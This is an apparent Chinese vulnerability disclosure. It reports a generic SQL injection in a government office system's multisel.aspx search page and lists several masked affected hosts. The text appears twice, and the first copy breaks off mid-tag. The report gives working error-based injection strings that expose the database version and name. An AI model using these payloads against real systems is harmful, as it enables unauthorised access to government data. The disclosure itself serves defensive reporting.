### 简要描述: ### 详细说明: 某政务系统一处通用SQL注入漏洞。 案例: http://**.**.**.**/workplate/base/user/multisel.aspx http://**.**.**.**:8001/workplate//base/user/multisel.aspx **.**.**.**:81/workplate//base/user/multisel.aspx **.**.**.**:82/workplate//base/user/multisel.aspx **.**.**.**:88/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx ### 漏洞证明: 证明: http://**.**.**.**/workplate/base/user/multisel.aspx 搜索:单引号 [<img src="https://images.seebug.org/upload/201506/220914030bd660f0ea31d1febe92862cc821e6ce.png" alt="QQ图片20150622090948.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/220914030bd660f0ea31d1febe92862cc821e6ce.png) 搜索 1' and @@version=1 and '%'=' 报错曝出数据库版本 [<img src="https://images.seebug.org/upload/201506/2209141375db02d5289f7fb74f95864cb5c148b6.jpg" alt="QQ图片20150622091152.jpg" width="600"...
### 简要描述: ### 详细说明: 某政务系统一处通用SQL注入漏洞。 案例: http://**.**.**.**/workplate/base/user/multisel.aspx http://**.**.**.**:8001/workplate//base/user/multisel.aspx **.**.**.**:81/workplate//base/user/multisel.aspx **.**.**.**:82/workplate//base/user/multisel.aspx **.**.**.**:88/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx ### 漏洞证明: 证明: http://**.**.**.**/workplate/base/user/multisel.aspx 搜索:单引号 [<img src="https://images.seebug.org/upload/201506/220914030bd660f0ea31d1febe92862cc821e6ce.png" alt="QQ图片20150622090948.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/220914030bd660f0ea31d1febe92862cc821e6ce.png) 搜索 1' and @@version=1 and '%'=' 报错曝出数据库版本 [<img src="https://images.seebug.org/upload/201506/2209141375db02d5289f7fb74f95864cb5c148b6.jpg" alt="QQ图片20150622091152.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/2209141375db02d5289f7fb74f95864cb5c148b6.jpg) 搜索 1' and db_name()=1 and '%'=' 报错曝出数据库表名 [<img src="https://images.seebug.org/upload/201506/22091422eb043856bdbf63ebc778a7dbbbc617b2.jpg" alt="QQ图片20150622091218.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/22091422eb043856bdbf63ebc778a7dbbbc617b2.jpg)